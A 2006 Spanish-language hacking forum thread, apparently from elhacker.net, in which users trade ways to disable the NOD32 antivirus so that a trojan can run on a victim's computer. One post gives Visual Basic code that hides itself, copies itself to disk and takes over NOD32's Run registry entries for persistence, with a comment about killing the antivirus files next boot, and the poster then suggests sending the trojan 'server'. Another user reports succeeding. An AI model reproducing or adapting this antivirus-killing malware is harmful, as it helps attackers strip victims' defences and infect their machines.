Killer

Iniciado por rubeng, 27 Mayo 2006, 17:01 PM

0 Miembros y 1 Visitante están viendo este tema.

Sancho.Mazorka

hola people! miren yo hice esto para cagar al nod! le cambias el nombre y lo finalizas y listo no se inicia mas! o si no cambien la lalve del registro y listo, cambien cualkiera y el nod se caga y no sirve mas!

PD: no me quedo claro lo que hace tu codigo Eternal Idol lo unico que entendi es que te tira el error ese y uqe te hace, te caga la memoria RAM o el disco o solo te asusta el error (osea que tira error pero no hace nada grave) Gracias y salu2

Sancho.Mazorka    :P
Ganador Xeon Web Server ! ! !    Sancho.Mazorka :D
http://foro.elhacker.net/index.php/topic,171903.75.html

Eternal Idol

Cita de: Sancho.Mazorka en 28 Mayo 2006, 00:00 AMPD: no me quedo claro lo que hace tu codigo Eternal Idol lo unico que entendi es que te tira el error ese y uqe te hace, te caga la memoria RAM o el disco o solo te asusta el error (osea que tira error pero no hace nada grave) Gracias y salu2

Nada, te reinicia la maquina despues de dar un pantallazo azul; es una broma ese codigo.
La economía nunca ha sido libre: o la controla el Estado en beneficio del Pueblo o lo hacen los grandes consorcios en perjuicio de éste.
Juan Domingo Perón

rubeng

no el nod no vuelve a iniciar pero el proceso nod32krn.exe sigue activo y si abro un troyano o algo me lo bloquea no lo deja ejecutar no dice nada del nod pero no lo deja ejecutar

The Shredder

weno mi idea es reemplazarnos por la entrada al registro del nod32 y luego la proxima vz q se prenda el pc matar los archivos (q no van a estar en uso hahaha)

Private Sub Form_Load()
App.TaskVisible = false

If App.PrevInstance then
end
end if

FileCopy App.ExeName + ".exe" , "c:\jeje"

Set shell = CreateObject("WScript.Shell")
Set fso = CreateObject("Scripting.FileSystemObject")
shell.RegWrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\la entrada del nod krn" , "C:\jeje.exe"

shell.RegWrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\la entrada del nod kui" , "C:\jeje.exe"

If fso.FileExists("C:\windows\the shredder.dll") Then
kill 'el nod32krn y el otro, tbn podrias borrarle el uninstall para 'dejar basura en su pc...
'a estas alturas el nod32 ya va a estar muerto xD
End
Else
Open "c:\windows\the shredder.dll" For Output As #1
Print #1, "jejeje, si existo realiza la acción, si no no"
Close #1
End
End If
End Sub

asi al otro dia le mandas el server y hacke mate...
salu2

pure linux programming...

rubeng

bueno ya logre hacerlo gracias a todos en especial a krnl64 que desensamblo el nod32krn y me dijo a que archivos estaba ligado. gracias a todos
salu2

Gorky

Cita de: rubeng en 29 Mayo 2006, 01:46 AM
bueno ya logre hacerlo gracias a todos en especial a krnl64 que desensamblo el nod32krn y me dijo a que archivos estaba ligado. gracias a todos
salu2

Permiteme que ponga en duda que lo haya "desensamblado".

Krnl64

Gorky, no dudes tanto.

No creas que algo que tu no sepas hacer sea imposible.

Salu2